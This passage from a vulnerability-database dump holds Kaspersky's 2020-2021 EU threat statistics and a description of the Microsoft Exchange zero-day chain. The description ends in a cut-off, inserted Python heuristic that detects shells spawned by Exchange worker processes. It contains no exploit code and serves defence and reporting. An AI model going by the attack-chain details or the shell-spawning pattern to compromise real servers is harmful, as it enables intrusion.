"percentile": "0.956590000", "modified": "2023-03-17"}, {"cve": "CVE-2021-25274", "epss": "0.049240000", "percentile": "0.915200000", "modified": "2023-03-17"}, {"cve": "CVE-2021-25275", "epss": "0.000570000", "percentile": "0.215290000", "modified": "2023-03-17"}, {"cve": "CVE-2021-25276", "epss": "0.000480000", "percentile": "0.146690000", "modified": "2023-03-17"}, {"cve": "CVE-2021-26411", "epss": "0.964250000", "percentile": "0.992420000", "modified": "2023-03-17"}, {"cve": "CVE-2021-26855", "epss": "0.975430000", "percentile": "0.999880000", "modified": "2023-03-17"}, {"cve": "CVE-2021-26857", "epss": "0.053690000", "percentile": "0.918940000", "modified": "2023-03-17"}, {"cve": "CVE-2021-26858", "epss": "0.106070000", "percentile": "0.940930000", "modified": "2023-03-17"}, {"cve": "CVE-2021-27065", "epss": "0.943940000", "percentile": "0.986930000", "modified": "2023-03-17"}], "vulnersScore": 0.8}, "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1660032824, "score": 1660035404, "epss": 1679073339}, 
"_internal": {"score_hash": "41e428b082b22d87709f2d1fea8745e6"}}
{"securelist": [{"lastseen": "2021-05-26T10:37:33", "description": "\n\n_All statistics in this report are from the global cloud service Kaspersky Security Network (KSN), which receives information from components in our security solutions. The data was obtained from users who have given their consent to it being sent to KSN. Millions of Kaspersky users around the globe assist us in this endeavor to collect information about malicious activity. The statistics in this report cover the period from May 2020 to April 2021, inclusive._\n\n## Main figures\n\n * **70% **of Internet user computers in the EU experienced at least one **Malware-class** attack.\n * In the EU, Kaspersky solutions blocked **115,452,157** web attacks.\n * **2,676,988 **unique URLs were recognized as malicious by our Web Anti-Virus.\n * **377,685 **unique malicious objects were blocked by our Web Anti-Virus.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the devices of **79,315** users.\n * **56,877 **unique users in the EU were attacked by ransomware.\n * **132,656 **unique users in the EU were attacked by miners.\n * **40%** users of Kaspersky solutions in the EU encountered at least one phishing attack.\n * **86,584,675** phishing attempts were blocked by Kaspersky solutions in the EU.\n\n## Financial threats\n\n_The statistics include not only banking threats, but malware for ATMs and payment terminals._\n\n### Number of users attacked by banking malware\n\nDuring the reporting period, Kaspersky solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of **79,315** users.\n\n_Number of EU users attacked by financial malware, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124132/01-en-european-ksb-2021.png>))_\n\n### Threat geography\n\nTo evaluate and compare the risk of being infected by 
banking Trojans and ATM/POS malware, for each EU country we calculated the share of users of Kaspersky products who faced this threat during the reporting period as a percentage of all attacked users in that country.\n\n_Geography of banking malware attacks in the EU, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124226/02-en-european-ksb-2021.png>))_\n\n**Top 10 EU countries by share of attacked users **\n\n| **Country** | **%*** \n---|---|--- \n1 | Cyprus | 1.3 \n2 | Bulgaria | 1.2 \n3 | Greece | 1.1 \n4 | Italy | 1.0 \n5 | Portugal | 1.0 \n6 | Croatia | 0.8 \n7 | Germany | 0.6 \n8 | Latvia | 0.6 \n9 | Poland | 0.6 \n10 | Romania | 0.6 \n \n_* The share of unique users in the EU whose computers were targeted by financial malware in the total number of unique EU users attacked by all kinds of malware._\n\n**Top 10 financial malware families**\n\n| **Name** | **%*** \n---|---|--- \n1 | Zbot | 24.7 \n2 | Nymaim | 11.5 \n3 | Danabot | 9.9 \n4 | Emotet | 8.9 \n5 | CliptoShuffler | 7.7 \n6 | BitStealer | 5.6 \n7 | SpyEyes | 3.5 \n8 | Gozi | 3.4 \n9 | Dridex | 3.2 \n10 | Trickster | 1.9 \n \n_* The share of unique users in the EU attacked by this malware in the total number of users attacked by financial malware._\n\n## Ransomware programs\n\nDuring the reporting period, we identified more than **17,317 **ransomware modifications and detected **25** new families. Note that we did not create a separate family for each new piece of ransomware. 
Most threats of this type were assigned the generic verdict, which we give to new and unknown samples.\n\n_Number of new ransomware modifications detected in the EU, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124303/03-en-european-ksb-2021.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nDuring the reporting period, ransomware Trojans attacked **56,877** unique users, including **12,358** corporate users (excluding SMBs) and **2,274** users associated with small and medium-sized businesses.\n\n_Number of users in the EU attacked by ransomware Trojans, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124332/04-en-european-ksb-2021.png>))_\n\n### Threat geography\n\n_Geography of attacks in the EU by ransomware Trojans, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124520/05-en-european-ksb-2021.png>))_\n\n**Top 10 EU countries by share of attacked users **\n\n| **Country** | **%*** \n---|---|--- \n1 | Greece | 0.56 \n2 | Cyprus | 0.38 \n3 | Portugal | 0.36 \n4 | Bulgaria | 0.31 \n5 | Hungary | 0.29 \n6 | Italy | 0.29 \n7 | Latvia | 0.28 \n8 | Slovenia | 0.27 \n9 | Spain | 0.26 \n10 | Estonia | 0.23 \n \n_* The share of unique users in the EU country whose computers were targeted by ransomware in the total number of unique users in that country attacked by all kinds of malware._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdict** | **%*** \n---|---|---|--- \n1 | (generic verdict) | Trojan-Ransom.Win32.Gen | 14.40 \n2 | (generic verdict) | Trojan-Ransom.Win32.Agent | 12.58 \n3 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 10.80 \n4 | (generic verdict) | Trojan-Ransom.Win32.Generic | 5.94 \n5 | Stop | Trojan-Ransom.Win32.Stop | 3.87 \n6 | WannaCry | Trojan-Ransom.Win32.Wanna | 3.20 \n7 | (generic verdict) | 
Trojan-Ransom.Win32.Crypmod | 2.31 \n8 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 2.30 \n9 | REvil/Sodinokibi | Trojan-Ransom.Win32.Sodin | 1.97 \n10 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 1.85 \n \n_* The share of unique Kaspersky users attacked by the given family of ransomware Trojans in the total number of users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of users attacked by miners in the EU\n\nDuring the reporting period, we detected attempts to install a miner on the computers of **132,656** unique users. Miners accounted for 0.53% of all attacks and 10.31% of all Risktool-type programs\n\n_Number of EU users attacked by miners, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124550/06-en-european-ksb-2021.png>))_\n\nDuring the reporting period, Kaspersky products detected Trojan.Win32.Miner.gen (generic verdict) more often than others, which accounted for 13.62% of all users attacked by miners. It was followed by Trojan.Win32.Miner.bbb (8.67%) and Trojan.JS.Miner.m (2.84%).\n\n### Threat geography\n\n_Geography of miner-related attacks in the EU, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124619/07-en-european-ksb-2021.png>))_\n\n## Vulnerable applications used by cybercriminals\n\nIn 2020, most vulnerabilities were discovered by researchers before attackers could exploit them. However, there was no doing without zero-day vulnerabilities, of which Kaspersky found:\n\n * CVE-2020-1380, a use-after-free vulnerability in the Jscript9 component of Microsoft's Internet Explorer browser caused by insufficient checks during the generation of optimized JIT code. 
This vulnerability was most likely used by the APT group [DarkHotel](<https://securelist.com/the-darkhotel-apt/66779/>) at the first stage of system compromise, after which the payload was delivered by an additional exploit that escalated privileges in the system;\n * CVE-2020-0986 in the GDI Print/Print Spooler component of Microsoft's Windows operating system, enabling manipulation of process memory for arbitrary code execution in the context of a system service process. Exploitation of this vulnerability gives attackers the ability to bypass sandboxes, for example, in the browser.\n\nThe first quarter of 2021 turned out to be rich not only in well-known vulnerabilities, but also in zero-day ones. In particular, both [IT security specialists](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>) and cybercriminals showed great interest in the new Microsoft Exchange Server vulnerabilities:\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26855>) \u2014 a Service-Side Request Forgery vulnerability that allows an attacker to make a forged server request and execute arbitrary code (RCE);\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26857>) \u2014 insecure object deserialization by the Unified Messaging service, which can lead to arbitrary code execution on the server side;\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>) \u2014 allows an attacker to write data to server files, which can also lead to remote code execution;\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-27065>) \u2014 similar to [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-26858>), this vulnerability allow an authorized Microsoft Exchange user to write arbitrary code to system files.\n\nThese vulnerabilities were found 
[in-the-wild](<https://encyclopedia.kaspersky.com/glossary/exploitation-in-the-wild-itw/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) and had been used by APT and ransomware groups.\n\nOne more constellation of vulnerabilities that appeared in the infosec sky was a threesome of critical bugs in the popular SolarWinds Orion Platform \u2013 [CVE-2021-25274](<https://nvd.nist.gov/vuln/detail/CVE-2021-25274>), [CVE-2021-25275](<https://nvd.nist.gov/vuln/detail/CVE-2021-25275>), [CVE-2021-25276](<https://nvd.nist.gov/vuln/detail/CVE-2021-25276>). Successful exploitation of any of them can cause infection of the system where the platform is installed (mostly, enterprise and government PCs).\n\n_Distribution of exploits used in attacks by type of application attacked, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124650/08-en-european-ksb-2021.png>))_\n\n_The rating of vulnerable applications is based on verdicts by Kaspersky products for blocked exploits used by cybercriminals both in network attacks and in vulnerable local apps, including on users' mobile devices._\n\nNetwork attacks were the most common method of system penetration, and a significant portion of them is made up of brute-force attacks on various network services: [RDP](<https://securelist.com/remote-spring-the-rise-of-rdp-bruteforce-attacks/96820/>), Microsoft SQL Server, etc. In addition, the year gone by demonstrated that everything in the Windows operating system is cyclical, and that most of the detected vulnerabilities exist in the same services, for example, in the drivers of the SMB (SMBGhost, SMBBleed), DNS (SigRed) and ICMPv6 (BadNeighbor) network protocols. Two critical vulnerabilities (CVE-2020-0609, CVE-2020-0610) were found in the Remote Desktop Gateway service. An interesting vulnerability, dubbed Zerologon, was also discovered in the NetLogon service. 
In Q1 2021, researchers found three new vulnerabilities in Windows network stack code related to IPv4/IPv6 protocols processing \u2014 [CVE-2021-24074](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2021-24074>), [CVE-2021-24086](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24086>) and [CVE-2021-24094](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24094>). Lastly, despite the fact that exploits for the EternalBlue and EternalRomance families are old, they are still used by attackers.\n\n## Attacks on macOS\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Monitor.OSX.HistGrabber.b | 14.50 \n2 | AdWare.OSX.Bnodlero.at | 12.04 \n3 | AdWare.OSX.Bnodlero.ay | 11.42 \n4 | AdWare.OSX.Bnodlero.ax | 10.56 \n5 | AdWare.OSX.Bnodlero.bg | 9.18 \n6 | Trojan-Downloader.OSX.Shlayer.a | 8.06 \n7 | AdWare.OSX.Pirrit.j | 6.23 \n8 | AdWare.OSX.Pirrit.ac | 6.05 \n9 | AdWare.OSX.Ketin.h | 5.30 \n10 | AdWare.OSX.Bnodlero.t | 4.94 \n11 | AdWare.OSX.Bnodlero.av | 4.82 \n12 | Trojan-Downloader.OSX.Agent.h | 4.48 \n13 | AdWare.OSX.Pirrit.o | 4.35 \n14 | AdWare.OSX.Cimpli.k | 3.75 \n15 | AdWare.OSX.Pirrit.gen | 3.75 \n16 | AdWare.OSX.Pirrit.aa | 3.58 \n17 | AdWare.OSX.Ketin.m | 3.22 \n18 | AdWare.OSX.Pirrit.q | 3.20 \n19 | AdWare.OSX.Ketin.l | 3.13 \n20 | AdWare.OSX.Spc.a | 2.87 \n \n_* The share of unique users who encountered this threat in the total number of users of Kaspersky security solutions for macOS who were attacked._\n\n### Threat geography\n\n_Geography of attacked macOS users in EU, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124726/09-en-european-ksb-2021.png>))_\n\n**Top 10 EU countries by share of attacked macOS users **\n\n| **Country** | **%*** \n---|---|--- \n1 | France | 15.32 \n2 | Spain | 13.99 \n3 | Italy | 11.43 \n4 | Portugal | 9.75 \n5 | Greece | 9.59 \n6 | Germany | 9.41 \n7 | Hungary | 8.60 \n8 | Lithuania | 
8.14 \n9 | Poland | 8.10 \n10 | Belgium | 7.94 \n \n_* The share of unique users attacked in the total number of users of Kaspersky security solutions for macOS in the country._\n\n## IoT attacks\n\n### IoT threat statistics\n\nDuring the reporting period, more than 80% of attacks on Kaspersky traps were carried out using the Telnet protocol.\n\nTelnet | 81.31% \n---|--- \nSSH | 18.69% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, May 2020 \u2013 April 2021_\n\nAs for distribution of sessions, Telnet also prevails, accounting for three quarters of all working sessions.\n\nTelnet | 75.66% \n---|--- \nSSH | 24.34% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, May 2020 \u2013 April 2021_\n\nAs a result, devices that carried out attacks using the Telnet protocol were selected to build the map of attackers' IP addresses.\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Telnet traps, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124758/10-en-european-ksb-2021.png>))_\n\n**Top 10 countries by location of devices from which attacks were carried out**\n\n| **Country** | **%*** \n---|---|--- \n1 | Greece | 26.84 \n2 | Italy | 18.55 \n3 | Germany | 7.92 \n4 | Spain | 7.46 \n5 | Poland | 5.66 \n6 | France | 5.60 \n7 | Romania | 5.52 \n8 | Sweden | 4.52 \n9 | Netherlands | 3.65 \n10 | Hungary | 2.95 \n \n_* The share of devices from which attacks were carried out in the given country in the total number of devices._\n\n### Malware loaded into honeypots\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 42.57 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 20.96 \n3 | Backdoor.Linux.Mirai.ba | 9.79 \n4 | Backdoor.Linux.Gafgyt.a | 5.42 \n5 | Backdoor.Linux.Gafgyt.a | 2.74 \n6 | Backdoor.Linux.Gafgyt.bj | 1.44 \n7 | Trojan-Downloader.Shell.Agent.p | 1.31 \n8 | 
Backdoor.Linux.Agent.bc | 1.20 \n9 | Backdoor.Linux.Mirai.cw | 1.15 \n10 | Backdoor.Linux.Mirai.cn | 0.82 \n \n_* The share of malware type in the total number of malicious programs downloaded to IoT devices following a successful attack._\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose, and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of the specific IP address (GeoIP) is established._\n\nKaspersky solutions in the EU blocked **115,452,157 **attacks launched from online resources across the globe. Moreover, 89.33% of these resources were located in just 10 countries.\n\n_Distribution of web attack sources by country, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124836/11-en-european-ksb-2021.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\n_To assess the risk of online infection faced by EU users, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the reporting period. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries._\n\nThis rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware. Overall, during the reporting period, adware and its components were registered on **89.60%** of users' computers on which Web Anti-Virus was triggered.\n\n_Geography of malicious web-based attacks, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124905/12-en-european-ksb-2021.png>))_\n\nOn average, **13.70% **of Internet user computers in the EU experienced at least one Malware-class attack during the reporting period.\n\n**Top 10 EU countries where users faced the greatest risk of online infection**\n\n| **Country** | **%*** \n---|---|--- \n1 | Latvia | 21.11 \n2 | Greece | 18.50 \n3 | Estonia | 17.52 \n4 | France | 16.81 \n5 | Bulgaria | 14.86 \n6 | Italy | 14.76 \n7 | Portugal | 14.44 \n8 | Lithuania | 14.21 \n9 | Hungary | 13.82 \n10 | Poland | 13.17 \n \n_* The share of unique users targeted by Malware-class attacks in the total number of unique users of Kaspersky products in the country._\n\n### Top 20 malicious programs most actively used in online attacks\n\nDuring the reporting period, Kaspersky's Web Anti-Virus detected **377,685 **unique malicious objects (scripts, exploits, executable files, etc.), as well as **2,676,988 **unique malicious URLs on which Web Anti-Virus was triggered. 
Based on the collected data, we identified the 20 malicious programs most actively used in online attacks on users' computers.\n\n| **Verdict*** | **%**** \n---|---|--- \n1 | Blocked | 49.22 \n2 | Trojan.Script.Generic | 12.52 \n3 | Hoax.HTML.FraudLoad.m | 8.38 \n4 | Trojan.PDF.Badur.gen | 2.46 \n5 | Trojan.Script.Agent.dc | 2.16 \n6 | Trojan.Multi.Preqw.gen | 2.11 \n7 | Trojan-Downloader.Script.Generic | 1.99 \n8 | Trojan.Script.Miner.gen | 1.56 \n9 | Exploit.MSOffice.CVE-2017-11882.gen | 1.02 \n10 | Trojan-PSW.Script.Generic | 0.91 \n11 | DangerousObject.Multi.Generic | 0.74 \n12 | Trojan.BAT.Miner.gen | 0.74 \n13 | Trojan.MSOffice.SAgent.gen | 0.60 \n14 | Trojan.Script.SAgent.gen | 0.50 \n15 | Trojan-Downloader.MSOffice.SLoad.gen | 0.47 \n16 | Trojan-Downloader.Win32.Upatre.pef | 0.33 \n17 | Trojan-Downloader.JS.Inor.a | 0.30 \n18 | Trojan-Downloader.MSWord.Agent.btl | 0.30 \n19 | Hoax.Script.Dating.gen | 0.27 \n20 | Trojan-Downloader.JS.SLoad.gen | 0.27 \n \n_* Excluded from the list are HackTool-type threats._\n\n_** The share of attacks by the given malicious program in the total number of Malware-class web attacks registered on the computers of unique users of Kaspersky products._\n\n## Local threats\n\n_Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer by infecting files or removable storage media, or initially arrived on the computer in a form that is not immediately visible (for example, programs inside complex installers, encrypted files, etc.). 
These statistics additionally include objects detected on user computers after the first system scan by Kaspersky's Anti-Virus application._\n\n_This section analyzes statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, as well as the results of scanning removable storage media._\n\n### Countries where users faced the highest risk of local infection\n\n_For each country in the EU, we calculated how often users there encountered a File Anti-Virus triggering during the year. Included are detections of objects found on user computers or removable media connected to them (flash drives, camera/phone memory cards, external hard drives). These statistics reflect the level of personal computer infection in different countries._\n\n_Geography of local infections by malware, May 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19124941/13-en-european-ksb-2021.png>))_\n\nDuring the reporting period, on average, at least one piece of malware was detected on **18.77%** of computers, hard drives or removable media belonging to KSN users in the EU.\n\n**Top 10 EU countries where users faced the greatest risk of local infection**\n\n| **Country** | **%*** \n---|---|--- \n1 | Greece | 32.60 \n2 | Bulgaria | 31.55 \n3 | Latvia | 31.38 \n4 | Estonia | 29.48 \n5 | Hungary | 27.88 \n6 | Lithuania | 27.11 \n7 | Portugal | 26.01 \n8 | Cyprus | 25.43 \n9 | Italy | 24.64 \n10 | Spain | 23.57 \n \n_* The share of unique users on whose computers Malware-class local threats were blocked in the total number of unique users of Kaspersky products in the country._\n\n### Top 20 malicious objects detected on user computers\n\nWe identified the 20 most commonly detected threats on EU users' computers during the reporting period. 
Not included are Riskware-type programs and adware.\n\n| **Verdict*** | **%**** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 19.45 \n2 | Trojan.Multi.BroSubsc.gen | 18.53 \n3 | Trojan.Script.Generic | 8.29 \n4 | Trojan.Multi.GenAutorunReg.a | 7.08 \n5 | Trojan.Multi.Misslink.a | 6.75 \n6 | Hoax.Win32.DriverToolKit.b | 2.77 \n7 | Trojan.MSOffice.SAgent.gen | 2.63 \n8 | Exploit.Script.Generic | 2.25 \n9 | Trojan.Win32.SEPEH.gen | 2.00 \n10 | Trojan-Downloader.Script.Generic | 1.91 \n11 | Worm.Win32.WBVB | 1.53 \n12 | Hoax.Win32.Uniblue.gen | 1.33 \n13 | Trojan.Script.Agent.gen | 1.29 \n14 | Trojan-Dropper.Win32.Scrop.adwo | 1.17 \n15 | Trojan.Multi.GenAutorunTask.c | 1.16 \n16 | Trojan.Win32.Generic | 1.12 \n17 | Trojan.Multi.GenBadur.gen | 1.10 \n18 | Trojan.BAT.Miner.gen | 1.09 \n19 | Trojan.Multi.GenAutorunTask.b | 1.07 \n20 | Trojan.Multi.GenAutorunTaskFile.a | 1.05 \n \n_* Excluded from the list are HackTool-type threats._\n\n_** The share of unique users on whose computers File Anti-Virus detected the given object in the total number of unique users of Kaspersky products whose Anti-Virus was triggered by malware._\n\n## Phishing in the EU\n\n### Phishing trends\n\n * **Cloud phishing**\n\nWe observed that the number of EU-targeted phishing resources hosted on cloud platforms and hosting sites approximately doubled during the reporting period.\n\n * **Cryptocurrency**\n\nThe number of cryptocurrency-related phishing detections tripled. This category consists of fraudulent sites linked in some way to cryptocurrencies: in most cases, they are fake crypto exchanges that require users to invest money to gain access to an account that allegedly already contains complimentary currency. 
In fact, users just lose their own money if they try to buy access to such sites.\n\nAnother particularly interesting type of phishing we observed in the EU is a mixture of cryptocurrency and COVID-19 themes: fake sites offering COVID-19 vaccines for cryptocurrency.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19131933/European_KSB_2021.jpeg>)\n\n**_Example of fake COVID-19 vaccine offer_**\n\n * **Targeted extortion**\n\nIn late August 2020, we saw some unusual extortion messages. In them, cybercriminals claimed to have planted TNT somewhere in the recipient's office and threatened to detonate it if the ransom was not paid or if police activity was observed near the building.\n\nWhereas individuals are asked to cough up the equivalent of $500\u20131,000 in bitcoin (the maximum we saw was around $5,000), for companies supposedly rigged with explosives the amount rises to roughly $20,000. The bulk of the scam e-mails are written in German, but we found English versions as well.\n\n * **Microsoft Office spear phishing**\n\nThe trend for harvesting Microsoft 365 credentials through spear phishing continues to evolve. Such phishing e-mails normally contain a hyperlink to a fake website, and users have been taught to be wary of links in unexpected e-mails. Once enough people had absorbed that simple precaution, phishers began replacing the links with attached HTML files whose sole purpose is to automate the redirection. Clicking on the HTML attachment opens it in a browser. As far as the phishing aspect goes, the file has just one line of code: a JavaScript assignment to window.location.href with the phishing website's address as its value. 
It forces the browser to open the website in the same window.\n\n### Phishing attacks\n\nIn total, **86,584,675** phishing attempts were blocked by Kaspersky solutions in the EU, representing 21.89% of all phishing attacks around the world during the reporting period.\n\n_EU share of phishing detections, April 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125028/15-en-european-ksb-2021.png>))_\n\n### Threat geography\n\nDuring the reporting period, approximately **13.4%** of users of Kaspersky solutions in the EU encountered at least one phishing attack.\n\n_Geography of EU phishing, April 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125056/14-en-european-ksb-2021.png>))_\n\n**Top 10 EU countries where users faced phishing attacks**\n\n| **Country** | **%*** \n---|---|--- \n1 | Portugal | 18.34 \n2 | France | 17.98 \n3 | Belgium | 15.10 \n4 | Greece | 14.98 \n5 | Hungary | 14.87 \n6 | Italy | 14.44 \n7 | Slovakia | 12.77 \n8 | Spain | 12.74 \n9 | Poland | 12.47 \n10 | Latvia | 12.26 \n \n_* The share of unique users targeted by phishing attacks in the total number of unique users of Kaspersky products in the country._\n\n### Organizations under attack\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nPandemic-related events affected the distribution of phishing attacks across the categories of targeted organizations. 
However, the largest categories remained unchanged, as they have for several years: in the EU during the reporting period, these were Global Internet portals (16.08%), Online stores (15.73%) and Payment systems (13.67%).\n\n_Share of phishing categories in the EU, April 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125126/16-en-european-ksb-2021.png>))_\n\n### Top-level domain (TLD) usage\n\nThe share of EU top-level domains (TLDs) counts all national TLDs belonging to EU member states. Over the reporting period, this share amounted to 7.27%.\n\n_Distribution of phishing domains by top-level domain, April 2020 \u2013 April 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125153/17-en-european-ksb-2021.png>))_\n\nThe share decreased significantly (by 3 p.p.) at the end of 2020, but in Q1 2021 we observed a slight increase, to 5.26%.\n\n_Timeline of share of EU top-level domains, Q2 2020 \u2013 Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19125220/18-en-european-ksb-2021.png>))_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/05/19134557/eu_flag.jpg>) | **The project leading to this report has received funding from the European Union's Horizon 2020 research and innovation programme under grant agreement No 883464.** \n---|---", "cvss3": {}, "published": "2021-05-26T10:00:32", "type": "securelist", "title": "Kaspersky Security Bulletin 2020-2021. 
EU statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0986", "CVE-2020-1380", "CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24094", "CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-26T10:00:32", "id": "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "href": "https://securelist.com/kaspersky-security-bulletin-2020-2021-eu-statistics/102335/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-10T12:32:23", "description": "\n\n## What happened?\n\nOn March 2, 2021 several companies [released](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) [reports](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) about in-the-wild exploitation of zero-day vulnerabilities in Microsoft Exchange Server. Together, these vulnerabilities allow an attacker to compromise a vulnerable Exchange server: to gain access to all registered e-mail accounts, or to execute arbitrary code (remote code execution, RCE) in the Exchange Server context. In the latter case the attacker can also establish persistence on the compromised server.\n\nA total of four vulnerabilities were uncovered:\n\n 1. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>). Server-side request forgery (SSRF): an unauthenticated attacker sends a specially crafted request that the Exchange server forwards to another destination on the attacker's behalf. On its own this does not execute code; in the observed attacks it was the entry point of the chain, used to bypass authentication and reach the post-authentication vulnerabilities below. \n 2. [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is an insecure deserialization vulnerability in the Unified Messaging service. An attacker who can feed the service crafted serialized data can make this high-privilege service execute arbitrary code (RCE).\n 3. [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) allows an authenticated Exchange user to overwrite any existing file on the system with attacker-controlled data. To reach it, the attacker has to compromise administrative credentials or chain another vulnerability such as the SSRF CVE-2021-26855.\n 4. [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is similar to CVE-2021-26858 and likewise allows an authenticated attacker to overwrite arbitrary files on the Exchange server. \n\nKaspersky [Threat Intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) shows that these vulnerabilities are already being used by cybercriminals around the world.\n\n_Geography of attacks with mentioned MS Exchange vulnerabilities (based on KSN statistics) ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/04171325/microsoft_exchange_expoit_map.png>))_\n\nWe predict with a high degree of confidence that this is just the beginning, and we anticipate numerous exploitation attempts aimed at gaining access to resources inside corporate perimeters. Furthermore, there is typically a high risk of [ransomware](<https://securelist.com/targeted-ransomware-encrypting-data/99255/>) infection and/or data theft connected to such attacks. 
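The chain described above ends with code running in the Exchange Server context, and the most visible early sign of that on the host is an Exchange worker process spawning a command shell. The following is an added example, not Kaspersky's code and not a reproduction of its EDR logic: a minimal process-tree heuristic run over constructed process-creation events (the fields mirror a generic endpoint log such as Sysmon event ID 1; the PIDs, paths and the harmless base64 string are made up for the test). It flags any powershell.exe, pwsh.exe or cmd.exe whose ancestry includes w3wp.exe, the IIS worker process, or UMWorkerProcess.exe, the Unified Messaging worker targeted by CVE-2021-26857 (including UMWorkerProcess.exe is this example's assumption, not something the report states), and raises the severity when the command line carries an encoded-command switch.

```python
"""Process-tree heuristic for post-exploitation on an Exchange server.

Added example (not Kaspersky's code): flags a shell launched, directly or
via an intermediate process, by an Exchange worker process. Sample events
are constructed to resemble a generic process-creation log (Sysmon ID 1
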